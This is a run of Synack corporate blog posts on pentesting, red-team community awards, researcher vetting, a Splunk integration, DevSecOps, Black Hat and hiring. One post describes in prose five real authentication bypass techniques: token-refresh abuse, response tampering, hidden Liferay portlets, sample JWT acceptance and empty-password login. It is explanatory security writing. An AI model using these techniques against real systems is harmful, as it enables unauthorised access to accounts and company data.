Traditionally, Red Teaming and Pentesting have been separate programs carried out by separate groups or teams. But Synack offers programs and solutions that combine both Pentesting and Red Teaming, all performed via one platform and carried out by the Synack Red Team, our diverse and vetted community of experienced security researchers. 

With Synack you have complete flexibility to develop a program that meets your security requirements. You can perform a Pentest to provide an overall view of your cybersecurity posture. Then conduct a Red Teaming exercise to check your defenses regarding specific company critical infrastructure or your adherence to security guidelines such as the OWASP (Open Web Application Security Project) Top 10, or the CVE (Common Vulnerabilities and Exposures) Checklist.

But don’t stop there. Your attack surface and applications are constantly changing. You need to have a long-term view of cybersecurity. Synack can help you set up continuous testing, both Pentesting and Red Teaming, to ensure that new cybersecurity gaps are detected and fixed or remediated as quickly as possible.

Learn More About Pentesting and Red Teaming

To learn more about how Synack Pentesting can work with Red Teaming to help protect your organization against cyberattack, contact us.

The post See Your Cyber Defenses with an Adversarial Perspective Using Red Teaming and Pentesting appeared first on Synack.

Ozgur Alp is a member of the Synack Red Team and has been awarded SRT of the Year 2021, Most Trusted Hacker 2021, Mentor of the Year 2022 and SRT Grand Champion for 2019, 2020 and 2021.

Authentication bypass vulnerabilities are common flaws that exist in modern web applications—but they’re not always easy to find. 

New authentication methods are working wonders to boost cybersecurity at many organizations. While tools like single sign-on (SSO) are often an improvement over old ways of logging users in, these technologies can still contain critical vulnerabilities. Whether it’s business logic errors or some other software flaw, it takes a keen eye to comb through all the complexity.

In this blog, I’ll cover five real-world authentication bypass techniques that I have found in the Synack Platform throughout my time as a member of the Synack Red Team. 

Example #1 – Refresh Token Endpoint Misconfiguration

In this case, once a user logged into the application with valid credentials, it created a Bearer Authentication token used elsewhere in the application. This auth token expired after some time. Just before expiration, the application sent a request to the back-end server within the endpoint /refresh/tokenlogin containing the valid auth token in the headers and username parameter on the HTTP body section. 

Further testing revealed that deleting Authorization header on the request and changing the username parameter on the HTTP body created a new valid token for the supplied username. Using this exploit, an attacker with an anonymous profile could generate an authentication token for any user by just supplying their username. 

Example #2 – Improper SSO Configuration

Most applications use SSO systems because they are easier to securely manage than juggling many authentication portals. But simply using SSO does not automatically protect the system: Configurations to the SSO must be secured as well. 

Here, one application was using the Microsoft SSO system for authentication. When visiting the internal.redacted.com URL, the web browser made a redirect to the SSO system:

On first sight, it seemed secure, but analyzing the back-end requests showed the application returned an unusually large content-length (over 40,000 bytes!) on the redirection response. 

Why would an application do this? Well, it was misconfigured. The application was leaking its internal responses to every request while sending the user to the redirection to the SSO. So, it was possible to tamper the responses and change the 302 Found header to 200 OK and delete the entire Location header, giving access to the whole application.

Also, it was possible to make this process automatic by adding Match & Replace rules in Burp Suite to delete the header directly and change the values automatically. 

Example #3 – CMS Based Access Problems

Content management systems (CMS) like WordPress, Drupal and Hubspot need to be securely configured as well, lest they introduce vulnerabilities in your organization.

One popular CMS platform, Liferay, was used in an internal application in one case I examined. The application only had a single login page accessible without authentication, and all other pages were restricted on the application UI.

For those not familiar with Liferay, the CMS uses portlets for application workflow, which have a parameter as p_p_id within numeric numbers. For that application, it was possible to access the login portlet by changing the parameter to value 58. On the normal login page, only the login form was accessible. However, by accessing the portlet directly, it was possible to reach the Create Account functionality, which then allowed self-registration to access internal applications without proper authorization.

Please note that while Liferay used this workflow before, its latest version uses portlet names instead of numeric ids. Still, it is possible to access other portlets by changing names as well.

Example #4 – Usage of Example JWT Tokens

JWT tokens, or JSON web tokens, are popular on new web applications. But while they have a secure mechanism by default, back-end server configuration should be secured, too. 

I worked on an assignment where SSO authentication was used for their internal applications. When visited directly, the application redirected the user to the Microsoft SSO web page. So far, so good. 

However, some JS files were accessible without authentication. Testing revealed that the application used JWT tokens that were sent via the Microsoft SSO system after a secure login. On the back-end mechanism, there was a security misconfiguration that didn’t check if the JWT token was generated for that specific application–instead, it accepted any JWT token that had a valid signature. So, using an example JWT token from Microsoft’s website: 

 

Within generic values:

It was possible to access the internal endpoints, leaking the company data. 

Example #5 – Changing Authentication Type to Null

In this instance, an application was sent all requests on the HTTP post data via base64 encoded XML requests. On the login mechanism, it sent the username as parameter alias and password as scode. The value inside the scode parameter was hashed. A quick analysis showed it used an md5 value of the supplied password value. There was another interesting sign in the request: scode had an attribute as type valued with 2. 

I tried assigning the value to 1, which would accept the cleartext password. It worked! So, brute force within cleartext values was possible. Not a big deal, but it was a sign I was on the right path. What about assigning it to the null values? Or other values such as -1, 0 or 9999999999? Most of them returned an error code except value 0. I tried several things with the attribute 0 but had no luck until I sent the password value as an empty value. 

I realized it was possible to access any account by simply supplying the usernames and empty passwords. It turned out to be quite a big bug. 

Conclusion

Complex authentication mechanisms can fall prey to undiscovered attack vectors, especially on applications prone to business logic flaws. Because automatic scanners mostly fail to key into these kinds of vulnerabilities, human power is still needed to find them. Given the complexity of modern software environments, no single security researcher can pick up on all possible vulnerabilities or attack vectors. On-demand security testing with a vetted community of researchers is the best way to combine everyone’s unique knowledge to find the vulnerabilities that matter. 

You can find Ozgur on  Twitter, LinkedIn and Medium.

The post Exploits Explained: 5 Unusual Authentication Bypass Techniques appeared first on Synack.

Trust. Honor. Excellence. These words are the foundational pillars for the Synack Acropolis and Synack Red Team. This past year, these core principles ushered in two new initiatives to address the rising cybersecurity talent gap and opportunity problems: Artemis Red Team and SRT Mentorship Program.

The Artemis Red Team is focused on creating the world’s best cybersecurity community for women, trans, non-binary and other gender minorities. The community’s purpose is to deliver opportunities for them to feel supported and expand their careers with like-minded excellence. Part of that mission is a commitment to helping researchers become their best by learning from the best, hence the formation of the SRT Mentorship program. Everyone has something to share, thus anyone can be a mentor. The SRT Mentorship program codifies this ideal by ensuring that mentors are recognized and turns what has historically been a purely philanthropic endeavor into an effective side-hustle earning researchers of all shapes and sizes additional opportunities, special rewards, pay incentives and recognition at the upper-echelons of the Synack Acropolis as an SRT Envoy or, even better, Mentor of the Year.

Together these programs amplify flames of curiosity, courage and camaraderie that have long existed in the hacker ethos, and the researchers who contribute their time, knowledge and passion will play an influential role in shaping the future of cybersecurity.

2021-22 Acropolis Winners

It is with great honor, pride and respect that Synack announces the following top award winners for this year’s recognition program:  

The awards from left to right are SRT of the Year, Rookie of the Year, Guardian of Trust and Mentor of the Year.

In addition, the following researchers have opted-in to showcase their recognition for dedication and commitment to excellence this past year:

TITAN
any1 Mustafa Can İPEKÇİ ozgur	paramil Ringo

 

---

 

OLYMPIAN
akmal Ayush Bawariya clod jkana101	magicsam niksthehacker pmnh w–

 

---

 

HERO
AhmetG Alibay Amal Aman Rawat Andrew Emil anilyuk AnInsiderThreat b0yd b1ackGamba b1ue Balamuralidharan bamhm182 Busra cinzinga cybery Cyphore dawgyg dk0pf duahaubadao gfuzzer Hazim Aslam Himanshu Giri Ibram Marzouk imparable Joke kernelsndrs Kuldeep Pandya Kunal Pandey leonishan luffydragneel malcolmst Muhammad Junaid	n00bmast3r n0xi0us Nicolas niden Orak Osirys Ovunc papyrus pbateman phurtim Preetham Bomma rekter0 RiDmo ry0shi Sanskar Sharma Shawar Khan shombo slife slowl3ak sorceror SteveOr SwoleTeamSix theone@7 uceka Usman Q Khan valbrux w00d x11 Yatin Sharma ynsy ZeRtOx

 

---

 

CIRCLE OF TRUST
Adam Logue bamhm182 busra Callum Carney dr0v3r FNGCrysis Johnathan Miranda	malcomst niksthehacker nicolas nukedx ozgur sorceror w–

 

---

 

SRT ENVOY MENTORS
aninsiderthreat BattleAngel busra Darthmrvader FNGCrysis impratikdabhi lvl0x00 magicsam N0C4ptch4 nagli	nicolas niden niksthehacker nukedx ozgur Promina packetmaven pmnh Ringo valbrux

Lifetime Achievement Program

The SRT Legends program is a lifetime achievement program that focuses SRT long-term goals directly towards addressing the cybersecurity talent-gap. The goal is for SRT to share their diverse skills with more than just a single program or customer. To achieve SRT Legend status, it takes time, dedication and a commitment to quality. This year Synack recognizes three new researchers to this hallowed class:

 

What’s Next

Who will claim next year’s coveted top spots? Who knows…it could be you! Take your first steps and apply to the Synack Red Team today, or reach out to @SynackRedTeam, @ryanrutan or on LinkedIn.

— Ryan Rutan

Sr. Director of Community, Synack Red Team

The post Announcing the 2021-22 Synack Acropolis, Legends and Featured Envoy Mentors appeared first on Synack.

It’s natural to wonder who makes up the Synack Red Team (SRT), our dedicated team of 1,500+ security researchers, and how they ended up finding vulnerabilities in our customers’ IT systems (with permission, of course). 

Companies want assurance they’re not opening the front door to just anybody. Much like you wouldn’t want a stranger in your home without a warm introduction from a mutual friend, we’ll explain how SRT researchers become part of an elite, global community of ethical hackers with diverse skill sets. 

Becoming an SRT Member Requires Building Trust 

One of the strengths of the SRT comes from its diverse community; our SRT members are top researchers in their respective fields—academia, government and the private sector. They hail from countries all around the world, including the United States, the United Kingdom, Canada, Australia and New Zealand. Human ingenuity takes many forms, and it’s that richness of difference that makes the SRT able to take on a seemingly endless list of security testing and tasks. 

Before joining the team, each prospective SRT member must first complete a 5-step vetting process that is designed to assess skill and trustworthiness. Historically, less than 10% of applicants have been accepted into the SRT, as we strive to add only those trusted individuals who will contribute positive results without excess noise to the platform. While our process loosely resembles bug bounty models, Synack sets the bar higher. 

Synack’s community team monitors online behavior from SRT members and removes SRT members immediately when required. Synack maintains a common standard and reward level across the SRT, allowing our clients to benefit from the clear understanding and agreement between SRT members and Synack for what constitutes a thorough report deserving of a high reward. They have collectively earned millions of dollars and have found thousands of vulnerabilities for Synack clients, including the U.S. Army and Air Force, the Centers for Disease Control and Protection and the Internal Revenue Service. 

Baking “Trust But Verify” Into the Process 

The Synack Platform ultimately powers our researchers. Synack works closely with clients to accurately scope testing and instruct them on how to use the Platform effectively. 

The Platform is also where SRT researchers submit findings to be triaged by our Vulnerability Operations team. VulnOps ensures that quality results are delivered to the client in a variety of formats (e.g. easily digestible reports, integration of data into existing security software). Clients are also able to communicate directly with researchers for questions or follow up. 

All SRT traffic goes through Synack’s VPN LaunchPoint to provide control and assurance around pentesting traffic. LaunchPoint focuses penetration testing traffic through one source, pauses or stops testing at the push of a button, provides complete visibility into the researcher’s testing activity with full packet capture, time-stamps traffic for auditing purposes and allows for data cleansing and deletion of sensitive customer data by Synack after it is no longer needed for testing.

Synack Works with Top Government and Private Sector Clients

Setting the bar higher allows Synack to work with clients who need additional assurance. Recently, we completed the requirements to achieve our FedRAMP Moderate “In Progress” level, which allows us to work with almost any U.S. federal agency. In past years, we’ve participated in Hack the Pentagon and several public hacking competitions for U.S. defense agencies, such as a 2019 effort in Las Vegas to find critical weaknesses in the F-15 fighter jet.

Malicious actors don’t need any clearance to hack into systems. Synack takes the task of combatting those bad actors seriously and our teams–from the Red Team to VulnOps–have worked to ensure that our clients receive vulnerability reports with actionable, secure information. We continue to innovate in the security testing and pentesting-as-a-service industry, ensuring privacy and security for all our clients while providing clear visibility into all testing through our trusted technology.

Interested in our work with the public sector? Click here.

The post Building Trust with a Vetted Team of Security Researchers appeared first on Synack.

In the cyber realm, organizations are often running their defensive and offensive security operations with little coordination.

Defensive security techniques, such as firewalls, endpoint detection and response, network access control, intrusion prevention and security information event management, detect and stop attackers. While offensive security offers a way to test the effectiveness of cyber defenses, including techniques and tools such as red teaming, penetration testing, vulnerability assessments and digital reconnaissance. Too often organizations focus on defensive security and not enough on offensive security testing.

Red Team vs. Blue Team

By design, security offense and defense teams work separately, with the red team or pentesters probing the attack surface looking for weaknesses, much like malicious hackers might. Without consistent and frequent communication between the two, the defense won’t know where to make improvements.

Security Operations Centers (SOC) focus on defensive cybersecurity. SOCs use many defensive security tools, as such they need a single pane of glass to view and correlate the data points coming from each source. Splunk Enterprise and Splunk Cloud (Splunk) are data platforms at the center of security operations that provide insights across disparate data streams to achieve end-to-end visibility for SOCs. Often missing are the results of offensive security testing into the SOC’s single pane of glass.

To combine offensive security data, Synack offers an add-on app for Splunk, allowing the SOC to view, correlate and receive alerts for the results of offensive security tests and recommended fixes to their defensive security in real time.

When information about security flaws isn’t accessible by the SOC, vulnerabilities and exploits uncovered by offensive security testing are reviewed only occasionally (e.g. in conjunction with periodic events such as yearly security compliance audits). New types of threats appear daily, so an occasional review isn’t sufficient to maintain good security posture. However, given the opportunity, Splunk’s architecture can ingest dynamic offensive security testing results and make such results actionable by security leaders.

An organization’s defenses can, and should, be tested against the latest security threats, not just the ones needed to pass a yearly compliance audit.

The Synack Integration with Splunk

Synack helps address these challenges by offering a premier security testing platform, supported by an expert, vetted community of security researchers who run continuous vulnerability assessments and deliver on-demand pentesting as new exploits emerge. The Synack Red Team (SRT)—1,500+ members strong—allows customers to take advantage of a diverse and instantly scalable security talent pool without the overhead of static headcount to accommodate surges in testing demand. Customers get offensive security testing 365 days a year with actionable reports to empower them to tackle new risks as they occur.

The Synack integration with Splunk uncovers exploitable vulnerabilities that can be correlated with network traffic, logs and other data collected by Splunk to recommend more effective security policies and rules on defensive tools (e.g. intrusion prevention systems and web application firewalls). Progress to harden an organization’s attack surface can be made by reviewing results, verifying recommendations and patching fixes (which can be verified by the SRT). The integration automates this process by facilitating continual improvement in security posture.

With the integration between Synack and Splunk, organizations can seamlessly coordinate offensive security into their SOC, enabling continuous defensive improvement in cyber security posture and protection. Splunk and Synack help all your team members work from the same playbook. 

To learn more about Synack’s premier security testing please visit our website, to learn about Splunk see their site and to access the Synack Integration with Spunk please visit the Splunkbase.

The post Splunk and Synack Partner to Bring Both a Defense and Offensive Strategy appeared first on Synack.

Security is too often an afterthought in the software development process. It’s easy to understand why: Application and software developers are tasked with getting rid of bugs and adding in new features in updates that must meet a grueling release schedule. 

Asking to include security testing before an update is deployed can bring up problems needing to be fixed. In an already tight timeline, that creates tension between developers and the security team. 

If you’re using traditional pentesting methods, the delays and disruption are too great to burden the development team, who are likely working a continuous integration and continuous delivery process (CI/CD). Or if you’re using an automatic scanner to detect potential vulnerabilities, you’re receiving a long list of low-level vulns that obscures the most critical issues to address first. 

Instead, continuous pentesting, or even scanning for a particular CVE, can harmonize development and security teams. And it’s increasingly important. A shocking 85% of commercial apps contain at least one critical vulnerability, according to a 2021 report, while 100% use open-source software, such as the now infamous Log4j. That’s not to knock on open-source software, but rather to say that a critical vulnerability can pop up at any time and it’s more likely to happen than not. 

If a critical vulnerability is found–or worse, exploited–the potential fines or settlement from a data breach could be astronomical. In the latest data breach settlement, T-Mobile agreed to pay $350 million to customers in a class action lawsuit and invest additional $150 million in their data security operations.

This is why many companies are hiring for development security operations (DevSecOps). The people in these roles work in concert with the development team to build a secure software development process into the existing deployment schedule. But with 700,000 infosec positions sitting open in the United States, it might be hard to find the right candidate. 

If you want to improve the security of your software and app development, here are some tips from Synack customers: 

• Highlight only the most critical vulns to the dev team. The development team has time only to address what’s most important. Sorting through an endless list of vulns that might never be exploited won’t work. Synack delivers vulnerabilities that matter by incentivizing our researchers to focus on finding severe vulnerabilities.

• Don’t shame, celebrate. Mistakes are inevitable. Instead of shaming or blaming the development team for a security flaw, cheer on the wins. Finding and fixing vulnerabilities before an update is released is a cause for celebration. Working together to protect the company’s reputation and your customers’ data is the shared goal. 

• Embrace the pace. CI/CD isn’t going away and the key to deploying more secure apps and software is to find ways to work with developers. When vulns are found to be fixed, document the process for next time. And if there’s enough time, try testing for specific, relevant CVEs. Synack Red Team (SRT) members document their path to finding and exploiting vulnerabilities and can verify patches were implemented successfully. SRT security researchers can also test as narrow or broad a scope as you’d like with Synack’s testing offerings and catalog of specific checks, such as CVE and zero day checks.

Security is a vital component to all companies’ IT infrastructure, but it can’t stand in the way of the business. For more information about how Synack can help you integrate security checkpoints in your dev process, request a demo.

The post Testing Early and Often Can Reduce Flaws in App Development appeared first on Synack.

The Black Hat cybersecurity conference celebrated its 25th birthday in Las Vegas this week – and Synack was there to mark the occasion in style.

We staged a safari adventure in the Black Hat Business Hall, replete with hanging vines, lush foliage, cheetah swag and the sounds of the jungle. We showed attendees how our security testing platform can be their trusted guide by offering access to our highly skilled, vetted and diverse crew of Synack Red Team security researchers.

When it comes to cybersecurity, it’s a jungle out there. Black Hat speakers drove home just how tangled and daunting the threat landscape has become.

“Things are going to get worse before they get better,” said Chris Krebs, inaugural director of the Cybersecurity and Infrastructure Security Agency, who delivered Black Hat’s keynote Wednesday. “The bad actors are getting their wins, and until we make meaningful consequences and impose costs on them, they will continue.”

Krebs, a founding partner of the Krebs Stamos Group cyber consultancy, also spoke to the urgency of the talent gap in cybersecurity that stands at an estimated 700,000 infosec pros in the U.S. alone and at least four times that number globally.

“It’s been confounding to me how we continue to face workforce shortages,” Krebs said. “We hear about the 3 million open cybersecurity jobs in the community, and I’m just trying to figure out why are we not solving the gap.”

Here are some other themes to emerge from this year’s talks:

• Ransomware remains a top-tier threat. To coincide with Black Hat, the U.S. State Department announced it’s offering a $10 million reward for information on several members of the Conti ransomware gang, which has wreaked havoc in U.S. healthcare and emergency services networks.
• The COVID-era digital transformation is here to stay. Underscoring that point, organizers held Black Hat in a hybrid format, with some infosec pros visiting Las Vegas in person and others tuning in online. (We followed suit, offering a Synack virtual booth experience – though remote attendees missed out on smoothies and Jungle Juice at our tiki bar.) COVID has spurred a rush to the cloud, introducing new challenges and vulnerabilities as employees log in from home.
• API security is a leading concern for CISOs. No one said securing application programming interfaces would be easy. From misconfigurations to vulnerabilities, APIs present a deluge of cyber risks despite being the beating heart of many modern applications. The Business Hall was abuzz over API security, but no one seems to have cracked the code as new breaches crop up seemingly every day.
• The pace of DevOps calls for constant security testing. The continuous integration and continuous deployment (CI/CD) pipeline empowers developers to make fast and efficient changes to their code, removing bottlenecks by automating the process as much as possible. But CI/CD pipelines now “control so much” that they’re upending the cyber risk environment for many organizations by introducing supply chain vulnerabilities, Chris Eng, chief research officer at Veracode, said in a closing panel yesterday. “It’s a different threat model than 10 years ago, when all you had to worry about was being attacked directly, or individually,” he said.
• Log4j is simple to exploit but still hard to find. The bombshell Log4j vulnerability sent security teams scrambling when it came to light in December 2021. But we’ve hardly seen the last of the critical flaw in the popular open source logging tool. “Easy stuff to exploit got cleaned up, but I think you will continue to see malicious threat actors innovate the way they find and exploit this,” said Heather Adkins, vice president of security engineering at Google, at a Black Hat talk on Log4j. “It will be around for a long, long time.”

Our Black Hat Experience

Synack solutions architect Hudney Piquant spoke to how seemingly secure attack surfaces can be vulnerable tomorrow to long-lasting threats like Log4j. Piquant shared his cyber survival knowledge in “the Cave” at Synack’s Black Hat booth, where members of the Synack Red Team also offered hard-won insights into remediating vulnerabilities that matter.

“To survive, companies need to start discovering their assets, analyzing their assets with a hacker’s perspective and continuously scanning their external attack surface,” Piquant said. “The reason all three of these things are important is because hackers are doing all three things as well.”

We’d like to thank everyone who stopped by our booth, scheduled one-on-one meetings with us in our executive suite at the Delano Hotel or joined us at the many events we organized or attended throughout Black Hat.

We enjoyed some friendly competition in a 9-hole golf tournament to kick off the week, co-hosted an exclusive whiskey tasting with Microsoft, sponsored a reception at the Cosmopolitan with the Retail and Hospitality Information Sharing and Analysis Center and raised a glass with security peers and investors at a happy hour held by GGV Capital and its portfolio partners.

And that’s not to mention our Rainbow-level sponsorship of the Diana Initiative conference that coincided with Black Hat, our many customer and employee dinners, the one-on-one meetings in our suite and the memorable product demos with security practitioners. We also boosted global reforestation by supporting One Tree Planted at our jungle-themed booth. 

If you missed us at Black Hat, don’t worry: Many Synackers and SRT members are sticking around in Vegas for DEF CON, which runs through Sunday! Look out for the security pros wearing swanky tuxedo shirts, in line with DEF CON’s “Hacker Homecoming” theme. And you can always click here to schedule a demo to learn how Synack’s platform can help deliver a better security testing experience.

In the meantime, we wish you luck as you continue your journey through the cyber wilderness!  

The post Synack at Black Hat: Leading You Through the Security Jungle appeared first on Synack.

Emily is the Artemis Red Team lead and community engagement manager at Synack. 

It’s past time for the cybersecurity industry to confront our diversity crisis as we work to close a talent gap that stands at 700,000 unfilled positions in the U.S. alone.

The Diana Initiative is dedicated to solving this national security challenge, and we at Synack are proud to support the nonprofit’s marquee event in Las Vegas next month as a Rainbow Sponsor. 

At the conference, I’ll also be sharing hard-won lessons from my own experience fostering a community for women, trans and nonbinary people to champion a more inclusive cyber workforce. I hope you’ll join me and Synack’s senior director of community Ryan Rutan, either in-person or virtual (for free), on Aug. 10 at 4 p.m. PST for our talk on Red-Teaming Cyber’s Diversity Problem at the Westin Las Vegas.

We’ll be discussing the origins of our Artemis Red Team, in which we combined mentorship opportunities, education resources and even a bit of game theory to elevate underrepresented voices in cybersecurity. The program launched late last year as a sub-community of our Synack Red Team, a group of 1,500+ top-notch security researchers who hail from an array of diverse cultures and backgrounds. 

Since then, the issue of diversity in cybersecurity has taken on renewed urgency as hacking threats continue to evolve and the global cyber skills shortage shows no sign of letting up. Camille Stewart Gloster, the White House’s newly appointed Deputy National Cyber Director for Technology and Ecosystem Security, put it well last week at a cyber workforce summit: 

“If we don’t invest in diversifying the workforce – in identifying voices that are not heard in the work – it impacts not only our workforce shortage and our ability to meet the demands on cybersecurity careers; it affects the efficacy of the work we are doing,” she said, calling it an “imperative to invest in diversity.”

In the world of offensive security and penetration testing, we have our work cut out for us. Red teams have traditionally lagged behind other cybersecurity arenas in terms of accessibility, diversity and equity. 

It’s high time to change that, and it will take all our collective ideas to do so. At The Diana Initiative, we hope we can inspire you to pursue your own programs for removing barriers to create a more inclusive community of cybersecurity professionals. And for those who may want to join the Artemis Red Team to see firsthand what we’re all about, we’ll be eager to meet you. 

See you in Vegas! Follow us on Twitter @ArtemisRedTeam and our hashtag #womenofthehunt.

The post Diversity as a Cybersecurity Imperative – Synack at the Diana Initiative appeared first on Synack.

Government agencies and public sector organizations have often struggled to compete with private companies for talent, a struggle only exacerbated by the COVID pandemic. A recent  Bureau of Labor Statistics report found that about half of government jobs in the U.S. remain unfilled compared to pre-pandemic numbers. 

This creates an even tighter squeeze on the already spent cybersecurity workforce; the White House reported a staggering 700,000 open cybersecurity roles in the U.S. The public sector continues to battle smaller budgets and fewer technical resources, while the challenge to protect the attack surface and anticipate new vulnerabilities becomes increasingly complex. 

Public-private partnerships can alleviate the pressure felt by the public sector globally by infusing top-tier talent into critical cybersecurity operations and providing consistent, readily available technology and support.

Government and public sector organizations are charged with keeping a country’s digital borders safe and secure. They’re needed to help keep the lights on, along with a myriad of other critical functions. To do that, organizations routinely test the health of their cybersecurity defenses. But are they getting the results and insight to keep up with today’s sophisticated cyber adversaries?  

Stale security practices keep public sector organizations in the past at a time when they need partners to help them operate on par with private companies.

Penetration testing, otherwise known as pentesting, is a technology that is fortunately evolving for the better.

Gone are the days of two people on-site with two laptops who take weeks to deliver a point-in-time report with few actionable insights. 

Here’s what modern pentesting can look like: a continuous process to sniff out critical vulnerabilities as they’re known, actionable results built into a seamless platform, and an ability to scale to respond to critical vulnerabilities like Log4j.   

The choice between outdated security testing and an agile, responsive pentesting solution to tackle a nation’s most pressing cybersecurity concerns is obvious. Synack provides premier security testing to keep public sector organizations at the top of their game, reducing risk while helping to keep critical data and infrastructure out of adversaries’ hands. Our innovative pentesting solution utilizes the Synack Red Team, a diverse community of more than 1,500 security researchers, and our secure platform to dig deep into web applications, cloud resources and other attack surfaces to find the vulnerabilities that matter most.  

Our recent whitepaper, “Government Agencies Deserve a Better Way to Pentest,” lays out the challenge with traditional pentesting and how public sector organizations can respond with maximum efficiency and limited budget. 

For U.S. government agencies

For U.K. public sector organisations 

The post No Time to Waste: Why the Public Sector Needs a Better Way to Pentest appeared first on Synack.

Charlie Waterhouse is a senior security analyst at Synack.

One major challenge in addressing the cybersecurity talent gap centers on capability. Even when you’ve found a candidate, do they have the right skills for your organization’s tech stack or just the list of certifications from the job description? Many organizations are missing out on talent and talent augmentation because of outdated hiring practices. 

Traditional Hiring Methods Might Screen Out the Best Candidates

If you’re having a hard time finding your next cyber candidate, ask yourself: Are you filtering out the best ones? Many great candidates are screened out by hiring systems for lacking traditional requirements like a four-year degree or a certain level of experience. Sometimes, the listed expectations are not only prohibitively rare, but impossible. I’ve seen job postings ask for five years’ experience in a technology that has only been around for three—and for an entry level position at that! There are also many job postings asking for an unreasonable 5-10 years in testing and analysis experience for an associate position. 

These job description errors have two detrimental effects: First, you discourage quality candidates from applying because they doubt their qualifications are applicable. Second, experienced practitioners may dismiss your company because they view the expectations as unreasonable. 

I have met many individuals with valuable cybersecurity skills who are frustrated at not being able to even land an interview. Priorities should shift to finding a candidate with the right skills, rather than looking for a litany of degrees or certifications. Often, these titles reflect theoretical knowledge but don’t necessarily signal actual hands-on experience or skill. A candidate may lack traditional resume items, but be a driven, passionate security professional who proves to be a star in your organization. 

Education and Investing in Employee Skills

There are plenty of training resources to help individuals start an IT or security career: BUiLT, FedVTE, Love Never Fails and others educate underserved communities. At Synack, we sponsor the Synack Academy, a program to train people for cybersecurity roles and recruit them for full-time roles upon graduation. Synack also actively recruits veterans both internally and for our global Synack Red Team community of top-notch security researchers.

The candidates who benefit from these educational efforts are hungry to advance and excel, putting in hours of their own time to learn new skills. Should you turn these individuals down just because they don’t check boxes like having a four-year degree? I wouldn’t. In my view, the people who graduate from these programs are some of the best you can hire. I would also encourage employers to provide access to training to advance skills of existing employees, an affordable initiative compared to the cost of searching for and hiring new candidates.

I know firsthand how successful a nontraditional candidate can be, as I was a nontraditional hire into security. I spent more than 20 years in the airline industry before coming to Synack as a security analyst. I do not have a degree in cybersecurity or a related field, but I did have an interest and drive to learn. I spent time working on real-life security problems and focused my energy on those scenarios. For example, I worked on Hack the Box to understand network security and exploitation of websites. Today, I am routinely brought into projects or client meetings as a technical expert on securing large enterprise environments. 

Evaluating What Skills Are Needed in Full-Time Roles

Even when a candidate has enticing skills, another dilemma can arise: Is your organization able to use them? Is there enough work to justify filling a full-time role?

Security needs come and go, and sometimes temporary work is a better option than adding a full-time employee. However, managing contractors is time-consuming, and finding them is challenging in its own right. 

Synack is particularly suited to address that challenge through talent augmentation. Researchers in our Synack Red Team can perform security testing on demand. When recruiting for the SRT, we assess each candidate’s skills and vet them carefully. This makes for a community with diverse, highly-skilled researchers who can tackle any attack surface. Some have traditional four-year degrees and practitioner experience, while others hail from less traditional backgrounds. But they all have the capability to help secure your organization. 

It’s Time To Rethink Your Approach to the Cybersecurity Talent Gap

At the end of the day, there are cyber candidates out there who can help bridge the talent gap. But traditional job descriptions might be prohibitively limiting. There are education initiatives underway aimed at bringing new, passionate people to the workforce, but additional hiring challenges may remain for cyber leaders. Alternative talent augmentation, like that brought by the Synack Red Team, may be the best option. 

The post Bridging The Cyber Talent Gap: Removing Barriers for Nontraditional Talent appeared first on Synack.

By Justine Desmond

Unemployment in cybersecurity is close to zero percent. If that’s not enough to cause concern, the global shortage of cyber professionals is estimated at 2.72 million individuals. With an economic downturn, there’s also more risk to hiring full-time positions. Whether you already have a pentest offering or would like to sell pentest services, scaling your team of skilled security testers is likely to be a major hurdle.

Synack can help. Synack is one of the world’s largest pentesting providers with an elite team of 1,500 security researchers and scalable technology. Our partners include a wide range of companies from Microsoft, a leading technology powerhouse, to regional partners such as Red River.

The benefits of Synack’s pentest offerings to our diverse partners include:

• On-demand test deployment 
• Talent augmentation 
• Faster revenue growth 

In some companies, pentesting is a bad word that brings to mind disruption, delays and ineffectiveness. Synack has redefined pentesting as responsive, continuous and intelligent.

What does a better pentest experience mean for our partners? 

On-Demand Deployment

Synack’s deployment and scoping process takes days, not weeks or months. As attack surfaces become more complex and dynamic, companies need more flexible testing. Synack can easily meet pentesting demand with an elite crowd of researchers, available 24/7/365. Our ability to quickly increase researchers on target enables Synack to launch tests in 3 days or less. You won’t run into the same scheduling delays with Synack as you would with a traditional pentesting firm. Additionally, Synack has self-service capabilities for existing customers. And it’s not just pentesting that is on-demand: Synack has the ability to address topical vulnerabilities, such as log4j, hours after they make headlines.

Talent Augmentation 

Synack can add more seats to your bench – whether you have an existing pentesting team or not. Synack’s researchers have to complete a rigorous vetting process that includes a criminal background check, video interviews and a skills assessment. These researchers have tactics, techniques and procedures (TTPs) that replicate what attacks look like today – not just a standard checklist. It’s the infosec equivalent of adding 50 Steph Currys to your team on-demand. Additionally, Synack goes beyond compliance by offering value-add features such as Jira and ServiceNow integrations, remediation assistance and researcher communication to help customers fix vulnerabilities and save time.

Faster Revenue Growth

Synack helped increase revenue growth by 800% over five years for one partner. Synack helps partners to increase their growth by providing easy margin. Synack can meet demand at scale with consistent quality, which is what differentiates us in a competitive market. You won’t have to worry about constraints such as talent capability, capacity and cost. 

If you’re interested in launching or expanding your pentesting business, look no further than Synack. Our work with over 400 customers speaks volumes about our reputation. Additionally, we work closely with many partners across the US, Europe, and Asia. If you think that Synack could be a helpful partner for you, please visit the Synack Partnerships microsite.

The post How Partners Increase Their Offerings and Revenue Growth with Synack appeared first on Synack.